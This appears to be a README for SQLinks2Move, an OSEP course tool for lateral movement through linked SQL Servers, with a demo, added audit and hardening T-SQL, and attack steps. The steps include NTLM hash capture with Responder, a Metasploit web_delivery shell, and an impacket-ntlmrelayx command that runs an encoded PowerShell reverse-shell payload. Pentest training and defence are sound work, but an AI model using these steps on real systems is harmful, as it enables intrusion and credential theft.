SQLinks2Move is a tool created during the OSEP (PEN-300) course. It is used to enumerate and link SQL Servers and perform lateral movement through them.
What it does depends on the values you enter. Once all values are specified, it does the following:
- It authenticates to the given SQL Server name and connects to it and to the specified database.
- It logs in as the current user.
- It maps the user (i.e. shows which database user the login is mapped to).
- It checks whether the current user is a member of the public role, then whether it is a member of the sysadmin role.
- It links the databases if possible.
- It checks whether there is an impersonable login, in two different ways.
- If specified, it will try to trigger an NTLM hash relay; you should set up Responder or impacket-ntlmrelayx before using it.
- It checks whether RPC OUT is enabled.
- It tries to enable RPC OUT if it is disabled.
- It impersonates the given username (if there is an impersonable user).
- It executes the given command on the specified remote linked SQL Server.
For a full understanding, refer to the code.
An analysis of the code will be written to provide better documentation.
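As an added example (not part of SQLinks2Move and not the author's code), the T-SQL below lets a DBA or defender see the same facts the tool enumerates from the server side: the current login's role membership and database mapping, the linked servers and their RPC OUT setting, how linked-server logins are mapped, and which logins hold IMPERSONATE on another login. It ends with two hardening statements using the names from the demo (PIZZA03, sa, PANDA\sqlsvc); that the IMPERSONATE grant exists for PANDA\sqlsvc is an assumption for illustration.

```sql
-- Added audit example (not SQLinks2Move code). Run as a DBA on the instance.

-- 1. Current login, its database user mapping, and server role membership
SELECT SUSER_SNAME()                AS login_name,
       USER_NAME()                  AS mapped_db_user,   -- "dbo" in the demo
       IS_SRVROLEMEMBER('public')   AS is_public,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. Linked servers and whether RPC OUT is enabled on each
SELECT name, product, provider, data_source,
       is_rpc_out_enabled,
       is_remote_login_enabled
FROM sys.servers
WHERE is_linked = 1;

-- 3. How linked-server logins are mapped. A fixed, privileged remote_name
--    (rather than uses_self_credential = 1) is what lets any local login
--    reach the remote server with that privilege.
SELECT s.name               AS linked_server,
       sp.name              AS local_login,     -- NULL = applies to all logins
       ll.uses_self_credential,
       ll.remote_name
FROM sys.linked_logins AS ll
JOIN sys.servers       AS s  ON s.server_id = ll.server_id
LEFT JOIN sys.server_principals AS sp ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1;

-- 4. Which logins may impersonate which other login (server scope)
SELECT grantee.name AS grantee_login,
       target.name  AS impersonable_login,
       p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE';

-- 5. Hardening (names from the demo; the grant to PANDA\sqlsvc is assumed)
-- Turn RPC OUT back off on a linked server that does not need it
EXEC sp_serveroption @server = N'PIZZA03', @optname = 'rpc out', @optvalue = 'false';
-- Remove the ability to impersonate sa
REVOKE IMPERSONATE ON LOGIN::sa FROM [PANDA\sqlsvc];
```

Query 2 is the server-side counterpart of the tool's RPC OUT check, and query 4 is one of the two ways an impersonable login can be found; if query 3 shows a linked server that maps every local login to a fixed sysadmin-level remote login, that link itself is the lateral movement path and should be re-mapped to use self credentials or a least-privilege remote login.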
- First, load the SQLinks2Move folder in Visual Studio and compile the code as Release.
- Then upload SQLinks2Move.exe to the target SQL Server that you already own.
- Execute SQLinks2Move.exe.
- Specify your values when prompted.
For legal reasons, I have hidden sensitive information in the pictures, so I will use random information to lead you through this demo.
First, running whoami, we see that we are PANDA\sqlsvc. Running hostname tells us that we are on the domain machine named KOALA01.
Running the SQLinks2Move binary, specifying the server name KOALA01 and the database master, and leaving all other values blank except for RPC, where we choose "N" for both, returns this result.
We can see that the authentication succeeded, that we are mapped as dbo, and that we are members of the public and sysadmin roles. We linked two SQL Servers, KOALA01\SQLEXPRESS and PIZZA03. The login sa can be impersonated.
Re-running SQLinks2Move.exe, this time specifying sa as the user to impersonate, hostname as the command to execute against the server PIZZA03, and choosing to check whether RPC is enabled and to allow enabling it.
We see that we impersonated sa successfully, that RPC OUT was disabled (hence the "False" answer), that we enabled it, and that executing hostname as sa against PIZZA03 returned the command output PIZZA03.
We have command execution, so for example, using the Metasploit web_delivery module with a PowerShell payload, we should be able to retrieve a shell on PIZZA03.
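From the defender's side, the two things this demo relies on, an EXECUTE AS LOGIN impersonation of sa and a linked-server option being flipped, are both auditable. The following is an added example (not part of SQLinks2Move) of a SQL Server Audit that records them, plus a query that surfaces any statement whose effective login differs from the login that opened the session, which is exactly what an impersonation looks like in the audit log. The audit name, file path and rollover settings are assumptions.

```sql
-- Added detection example (not SQLinks2Move code). Names and paths are assumed.
USE master;
GO
-- Write audit events to a local file target (path is an assumption)
CREATE SERVER AUDIT LateralMovementAudit
    TO FILE (FILEPATH = 'D:\SQLAudit\', MAXSIZE = 256 MB, MAX_ROLLOVER_FILES = 20)
    WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE);
GO
-- Select the server-level action groups that cover this demo's steps
CREATE SERVER AUDIT SPECIFICATION LateralMovementSpec
FOR SERVER AUDIT LateralMovementAudit
    ADD (SERVER_PRINCIPAL_IMPERSONATION_GROUP),  -- EXECUTE AS LOGIN (impersonating sa)
    ADD (SERVER_ROLE_MEMBER_CHANGE_GROUP),       -- new members of sysadmin
    ADD (SERVER_PERMISSION_CHANGE_GROUP),        -- GRANT / REVOKE IMPERSONATE ON LOGIN
    ADD (SERVER_OBJECT_CHANGE_GROUP),            -- linked servers created, altered, dropped
    ADD (SERVER_OPERATION_GROUP)                 -- ALTER SETTINGS-class changes (server options)
WITH (STATE = ON);
GO
ALTER SERVER AUDIT LateralMovementAudit WITH (STATE = ON);
GO

-- Review: every audited statement where the effective login is not the
-- login that opened the session, i.e. it ran under an impersonated identity.
SELECT event_time,
       session_server_principal_name AS session_login,   -- e.g. PANDA\sqlsvc
       server_principal_name         AS effective_login, -- e.g. sa
       action_id,
       succeeded,
       statement
FROM sys.fn_get_audit_file('D:\SQLAudit\*.sqlaudit', DEFAULT, DEFAULT)
WHERE server_principal_name <> session_server_principal_name
ORDER BY event_time DESC;
```

In the demo above, the review query would show PANDA\sqlsvc as the session login and sa as the effective login for the hostname execution, and the SERVER_OPERATION_GROUP / SERVER_OBJECT_CHANGE_GROUP events would record the RPC OUT change on the PIZZA03 link; forwarding these audit files to a SIEM is the usual way to alert on them.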
By setting up Responder with sudo responder -I [interface] and specifying your LHOST when prompted by SQLinks2Move.exe, we can retrieve an NTLM hash and attempt to crack it.
Alternatively, we can set up impacket-ntlmrelayx and execute a command to get a reverse shell on PIZZA03 if the target is vulnerable.
For example, using:
sudo impacket-ntlmrelayx --no-http-server -smb2support -t [PIZZA03_ip_address] -c 'powershell -enc <base64>'
TODO: Screenshot of impacket-ntlmrelayx